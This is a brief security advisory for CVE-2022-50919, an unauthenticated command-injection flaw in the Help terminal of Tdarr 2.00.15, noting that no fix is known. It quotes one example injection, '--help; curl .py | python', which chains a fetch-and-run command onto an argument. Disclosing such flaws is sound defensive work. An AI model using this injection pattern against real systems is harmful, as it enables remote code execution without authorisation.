Tdarr · Tdarr · CVE-2022-50919
**Name of the Vulnerable Software and Affected Versions**
Tdarr version 2.00.15
**Description**
The software contains an unauthenticated remote code execution issue in its Help terminal. An attacker can inject and chain arbitrary commands due to a lack of input filtering. Specifically, an attacker can exploit this by chaining commands such as `--help; curl .py | python` to execute remote code without authentication.
**Recommendations**
At the moment, there is no information about a newer version that contains a fix for this vulnerability.